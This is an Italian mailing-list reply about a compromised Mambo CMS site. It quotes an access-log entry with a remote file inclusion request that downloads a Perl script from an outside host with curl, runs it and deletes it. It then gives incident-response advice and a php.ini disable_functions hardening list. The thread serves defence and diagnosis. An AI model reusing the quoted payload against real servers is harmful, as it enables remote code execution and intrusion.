On Fri, May 12, 2006 at 10:50:49AM +0200, Ivan Sergio Borgonovo wrote:
> On Fri, 12 May 2006 10:25:04 +0200
> Filippo Biondi <fbiondi@xxxxxxxxxxxxxxxx> wrote:
>
> > [access.log]
> > 85.119.158.42 - - [09/May/2006:10:06:48 +0200]
> > "GET
> > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/jo-ann/tools.gif?&cmd=cd%20/tmp/;curl%20-O%20http://www.freewebs.com/jo-ann/gif.txt;perl%20gif.txt;rm%20-rf%20gif*?
> > HTTP/1.0" 200 27356 "-" "Mozilla/5.0" [/access.log]
> >
> > anche se del file gift.txt non v'e' l'ombra
>
> rm%20-rf%20gif*
Esatto. Probabilmente hai un qualche coso in perl che gira ancora,
controllaci (anche con nome di processo cambiato, fai anche un netstat
-anp; poi un buon debsums -s [*]se sei in debian (o equivalente per
altre distro) e cmq controllerei il
kernel, processi in esecuzione, netstat, tcpdump. Vedi anche /tmp/ & co
oltre a controllare tutti i file scrivibili da www con un backup recente
(o, meglio, tutto il sistema).
Cerca di capire se han fatto root o no, se han fatto root, sei un po'
piu' nella cacca e devi ricontrollare il sistema ancora meglio.
tmp, home & co noexec aiuta, ma non con un attacco di questo genere (i
comandi vengono lanciati via perl
[*]: se poi si decidessere a signare tutti i pacchetti <g>
>
> Cos'era questa roba? mambo?
Si, mambo, vulnerabilita' stranota e stravecchia.
Consigliabile hardening config php (basedir & co aiutato), per esempio
vedi mio talk/slide/video:
http://erlug.linux.it/linuxday/2005/
Una cosa simile nel php.ini (ci sono anche piu' funzioni, vedi articolo
di ascii che trovi in giro, tipo:
http://onlamp.kugelmass.homeunix.net/articles/view.xml/1/modify.xml)
puo' anche essere una cosa buona e giusta (occhio a che secchi un sacco
di cose):
disable_functions = system,exec,passthru,shell_exec,pnctl_exec,escapeshellcmd,
dl,popen,pclose,proc_open,proc_close,proc_terminate,
set_time_limit,error_reporting,ini_set
bye
K.
|
